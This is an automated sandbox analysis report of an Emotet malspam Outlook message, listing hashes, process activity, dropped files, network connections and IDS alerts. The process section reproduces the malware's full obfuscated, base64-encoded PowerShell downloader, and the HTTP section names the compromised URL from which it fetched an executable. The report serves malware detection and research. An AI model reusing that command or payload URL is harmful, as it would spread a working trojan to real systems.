analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

Transaction for invoice.msg

Full analysis: https://app.any.run/tasks/3a5a31f7-6195-480a-a701-b361ca59f4cd
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Analysis date: March 14, 2019, 21:23:12
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
opendir
loader
emotet
emotet-doc
Indicators:
MIME: application/vnd.ms-outlook
File info: CDFV2 Microsoft Outlook Message
MD5:

7AABF298BA4976E35A7A287066744650

SHA1:

47BF0BB94956047478CBFCF866D722C0C3A43383

SHA256:

9CCF79FD0BDAC98F8FAC47AB432E5F9B25C28B0E7140082ACF58AA8A74DF8A22

SSDEEP:

6144:DS+k8Hhr77HUUUUUUUUUUUUUUUUUUUT52Vjc/7m3bX1SHRUXTBUb2vqrt2w2N8v:KUhr77HUUUUUUUUUUUUUUUUUUUTCjcD5

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Downloads executable files from the Internet

      • powershell.exe (PID: 3940)
    • Application was dropped or rewritten from another process

      • 492.exe (PID: 2176)
      • wabmetagen.exe (PID: 3756)
      • 492.exe (PID: 3044)
      • wabmetagen.exe (PID: 2700)
    • Emotet process was detected

      • wabmetagen.exe (PID: 3756)
  • SUSPICIOUS

    • Application launched itself

      • WINWORD.EXE (PID: 3088)
      • 492.exe (PID: 3044)
      • wabmetagen.exe (PID: 3756)
    • Creates files in the user directory

      • OUTLOOK.EXE (PID: 2892)
      • powershell.exe (PID: 3940)
    • Starts Microsoft Office Application

      • WINWORD.EXE (PID: 3088)
      • OUTLOOK.EXE (PID: 2892)
    • Executable content was dropped or overwritten

      • 492.exe (PID: 2176)
      • powershell.exe (PID: 3940)
    • Starts itself from another location

      • 492.exe (PID: 2176)
  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 3088)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 4080)
      • WINWORD.EXE (PID: 3088)
      • OUTLOOK.EXE (PID: 2892)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.msg | Outlook Message (41.3)
.oft | Outlook Form Template (24.1)
.doc | Microsoft Word document (18.6)
.doc | Microsoft Word document (old ver.) (11)
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
41
Monitored processes
8
Malicious processes
4
Suspicious processes
0

Behavior graph

Click at the process to see the details
start drop and start drop and start outlook.exe winword.exe no specs winword.exe no specs powershell.exe 492.exe no specs 492.exe #EMOTET wabmetagen.exe no specs wabmetagen.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
2892"C:\Program Files\Microsoft Office\Office14\OUTLOOK.EXE" /f "C:\Users\admin\AppData\Local\Temp\Transaction for invoice.msg"C:\Program Files\Microsoft Office\Office14\OUTLOOK.EXE
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Outlook
Version:
14.0.6025.1000
3088"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Outlook\44POY9HV\Untitled_03_2019_7706538.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEOUTLOOK.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
4080"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /EmbeddingC:\Program Files\Microsoft Office\Office14\WINWORD.EXEWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Microsoft Word
Exit code:
0
Version:
14.0.6024.1000
3940powershell -e LgAgACgAIAAkAHMAaABlAGwAbABJAGQAWwAxAF0AKwAkAHMASABlAGwATABJAEQAWwAxADMAXQArACcAWAAnACkAIAAoACAAbgBFAHcALQBvAEIAagBFAGMAVAAgAGkATwAuAFMAVABSAGUAQQBNAHIAZQBBAEQAZQByACgAIAAoAG4ARQB3AC0AbwBCAGoARQBjAFQAIABzAHkAUwB0AGUAbQAuAGkAbwAuAGMATwBNAFAAcgBFAFMAcwBJAE8ATgAuAGQAZQBGAEwAQQBUAEUAUwBUAHIAZQBhAE0AKAAgAFsASQBvAC4AbQBFAG0AbwBSAFkAcwB0AFIAZQBBAE0AXQBbAGMAbwBOAHYAZQBSAFQAXQA6ADoARgByAE8AbQBCAGEAUwBFADYANABTAFQAcgBpAE4ARwAoACAAKAAnAFgAJwArACcAWgBKAGgAJwArACcAYgA5AG8AdwAnACsAJwBFAEkAYgAvAFMAagA1AEUAJwArACcATQBvACcAKwAnAGcAUgAnACsAJwBsAHkAMQAnACsAJwBiAFcAYQBOAEkAdgBaACcAKwAnAEEAdQBRACcAKwAnAG0AJwArACcASwBvADEAcABaADEAcQB5AFoATgBUAGoAaABJAGEAJwArACcAbQBOAG4AagAnACsAJwBpAEUAdABpACcAKwAnAFAAOQBlADAANQBaADIAJwArACcAbQB2ADMATgA5ADkAeAA3AHIAJwArACcAOQA2ACcAKwAnAHoAbgArAFMAJwArACcAUQBsAFIAbgAnACsAJwBFAGgARQBQAHEATAAnACsAJwBnACcAKwAnAEMASgAvAEYAKwA1AGcAQgAnACsAJwBCAGkAaABkADEAUQBGADMAZABZAFcAbQArAE8ATgAnACsAJwByAGoAQgAnACsAJwBZAGkASgByAFYARAAnACsAJwBiACcAKwAnAHkANQBVAGoAJwArACcAQQBSACcAKwAnAE0AUwBrAHMAcgBhADUAbwBOACcAKwAnAFIAcQAnACsAJwBMAFEAdQBVAFYAJwArACcAaQB0ACcAKwAnAFoAJwArACcASwB3AHgAJwArACcASwB2AGEAJwArACcAWgBkACcAKwAnAE0AeQB5ACcAKwAnADEAcwBvADYAbQBtADAAWgBxAHYAJwArACcAbQAnACsAJwBqACcAKwAnAHAAaAAwACcAKwAnADkAagBSAFMAOQBQAEwAVwAnACsAJwBoAE0AYgBiACcAKwAnAFcAcAA5ACcAKwAnAFoAbwAzAHYASwAnACsAJwB4AGUAJwArACcAdQAvAGgAJwArACcAaQBYACcAKwAnAFMAdAAnACsAJwBhACcAKwAnAFgASQBuAFoAJwArACcATQA5AHMAZQA0AGMAMgBXAEsAeQAnACsAJwBlADMAMABCAFkAbABOADYAagAnACsAJwA0AEUANwAwAGIAagBZADAAJwArACcAcABOAGoAUgAnACsAJwBsAC8AJwArACcASQAzAHQAdQBpADYAJwArACcAdwAnACsAJwBGACcAKwAnAFIAJwArACcAWgBjACcAKwAnADEAJwArACcARwAnACsAJwBwAGwAJwArACcARAAnACsAJwBUACcAKwAnADQATAB0ACsAYwBmACcAKwAnADUAVwAnACsAJwBJACcAKwAnAHIANgAnACsAJwBmAHoAbQAvAEgAYgAnACsAJwAzAFoAbQAnACsAJwBLADEAYgBzAHUAbgArAHAAawBOAFIAMgAnACsAJwBOAHAANgBYAHoANgBsACcAKwAnADUATABnAFcAeQBOAHIAMgB5AE8AJwArACcAWABwAEIALwA1AE4AJwArACcAWQBnAFUAbQAnACsAJwBMACcAKwAnADYAUAAnACsAJwB5ACcAKwAnAFgAZQA0AHoAVgBqADQAMAArAFgAegBkAFoAJwArACcAUgBtAGUAJwArACcAYwA2ADgAMgBDAFAAaAAnACsAJwA1ACcAKwAnAC8AZgB1ACcAKwAnAG8AJwArACcAZQAnACsAJwB0AGMAYwBHACcAKwAnAEYAJwArACcATQBaACcAKwAnAGcASQAwACcAKwAnAFQATgBpAFIAbQAnACsAJwBiAEUAJwArACcAUwAnACsAJwBXAEEANABRACcAKwAnACsANgBpADIARgA1AHMAVwBUAFcAUAAwAHMAcAAnACsAJwBZADQASQBMAC8ASgA0AEMAUQB4AEkAQQBIAGUAJwArACcASQA0AG0AVwAyAHEAQgAnACsAJwBMAG8AZQBkAGYAcAAnACsAJwBhACcAKwAnAEgAYgBnAGwAYwByADcAJwArACcAeQAnACsAJwBYAGsALwB0ADYAYQAnACsAJwBoAC8AMwAnACsAJwBMAFMAJwArACcAbwAnACsAJwBKACcAKwAnAFUAJwArACcAZAAnACsAJwArAHEAWQAnACsAJwA1AGgAYwBuAGQASQAnACsAJwBMAGYAZQBhAC8ARABuACcAKwAnAE4AOAA3AEUATgBsAHgAJwArACcATAAnACsAJwBQAGsAQgBmACcAKwAnADUAJwArACcAdwAnACsAJwBwAFMARQBnADAAJwArACcAWAAnACsAJwBYAHEAOQAnACsAJwBYAG8AWgAnACsAJwAyAE8ATABXADQALwBnACcAKwAnAGMATwBKAEwAcQBJAEsAbQArADQAUQBpADgAOABjACcAKwAnADYAZgB2ADcAJwArACcAYQAnACsAJwBkAHEAcQAnACsAJwB3AFgAKwBSADAAJwArACcAYgAnACsAJwArAFQAJwArACcAagBnAHgANQAnACsAJwBsAFMAJwArACcAdgBHAFUAQwBlAHUARQA5AFMATwBNACcAKwAnAE0AaQBPACcAKwAnAGgAJwArACcAeABLAGIAJwArACcAcwB0AHEAZgB6AGoANAAxADUAQwB4AEwATgBHAE8AJwArACcAWQBaAEEASQB5AEUAbgAwACcAKwAnAEMAQQA9AD0AJwApACAAKQAsACAAWwBTAFkAUwBUAGUAbQAuAGkATwAuAGMAbwBtAFAAcgBFAHMAUwBpAE8AbgAuAEMATwBtAHAAcgBlAFMAcwBpAG8AbgBtAG8ARABFAF0AOgA6AGQAZQBjAE8AbQBwAHIAZQBTAFMAIAApACkAIAAsACAAWwBTAHkAUwB0AGUAbQAuAFQARQB4AFQALgBlAE4AYwBvAGQASQBuAGcAXQA6ADoAQQBTAEMASQBpACkAIAApAC4AcgBFAGEAZABUAE8ARQBOAEQAKAApACAAC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
wmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3044"C:\Users\admin\492.exe" C:\Users\admin\492.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Sticky Notes
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2176"C:\Users\admin\492.exe"C:\Users\admin\492.exe
492.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Sticky Notes
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3756"C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe"C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe
492.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Sticky Notes
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2700"C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe"C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exewabmetagen.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Sticky Notes
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
3 803
Read events
2 990
Write events
0
Delete events
0

Modification events

No data
Executable files
2
Suspicious files
6
Text files
24
Unknown types
2

Dropped files

PID
Process
Filename
Type
2892OUTLOOK.EXEC:\Users\admin\AppData\Local\Temp\CVRDD9F.tmp.cvr
MD5:
SHA256:
2892OUTLOOK.EXEC:\Users\admin\AppData\Local\Temp\~DFB71F03AD0F82374A.TMP
MD5:
SHA256:
2892OUTLOOK.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Outlook\44POY9HV\Untitled_03_2019_7706538 (2).doc\:Zone.Identifier:$DATA
MD5:
SHA256:
3088WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVRF0D9.tmp.cvr
MD5:
SHA256:
3088WINWORD.EXEC:\Users\admin\AppData\Local\Temp\OICE_457E3D4E-E0AC-4A6D-BDF4-303B4DB586B5.0\E591BCBD.doc\:Zone.Identifier:$DATA
MD5:
SHA256:
4080WINWORD.EXEC:\Users\admin\AppData\Local\Temp\OICE_457E3D4E-E0AC-4A6D-BDF4-303B4DB586B5.0\~DFE11313137C36E961.TMP
MD5:
SHA256:
3940powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\OVCFIHQ3J1LBQN8N7MRY.temp
MD5:
SHA256:
2892OUTLOOK.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$rmalEmail.dotmpgc
MD5:C2377EA41E6C9E7E7DD6F0D9F74CFF3D
SHA256:E7C2BEAC2BA6D28BE6C3422D7D66716F04D8675D5BC80D28983E45CAA2821248
3088WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:073B4A86CF48948207FBF1A28661FB50
SHA256:FF6DC0FC3FE8EFD1BD2A11CC2C932620E4172F0B3863B180231F6CE3B084B8D7
2892OUTLOOK.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Outlook\44POY9HV\Untitled_03_2019_7706538.docdocument
MD5:44705FA785955CB602EF87B42A891745
SHA256:DB12BD01917D9D2395C3C5B37B344C542975062850B3828876C9FE6A2E0CADB8
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
2
TCP/UDP connections
2
DNS requests
2
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2892
OUTLOOK.EXE
GET
64.4.26.155:80
http://config.messenger.msn.com/config/msgrconfig.asmx?op=GetOlcConfig
US
whitelisted
3940
powershell.exe
GET
200
52.60.139.161:80
http://toolbeltonline.com/wp-content/uploads/368n/
CA
executable
360 Kb
suspicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2892
OUTLOOK.EXE
64.4.26.155:80
config.messenger.msn.com
Microsoft Corporation
US
whitelisted
3940
powershell.exe
52.60.139.161:80
toolbeltonline.com
Amazon.com, Inc.
CA
suspicious

DNS requests

Domain
IP
Reputation
config.messenger.msn.com
  • 64.4.26.155
whitelisted
toolbeltonline.com
  • 52.60.139.161
  • 35.182.171.82
suspicious

Threats

PID
Process
Class
Message
3940
powershell.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
3940
powershell.exe
Potentially Bad Traffic
ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
3940
powershell.exe
Misc activity
ET INFO EXE - Served Attached HTTP
3940
powershell.exe
Misc activity
ET INFO EXE IsDebuggerPresent (Used in Malware Anti-Debugging)
No debug info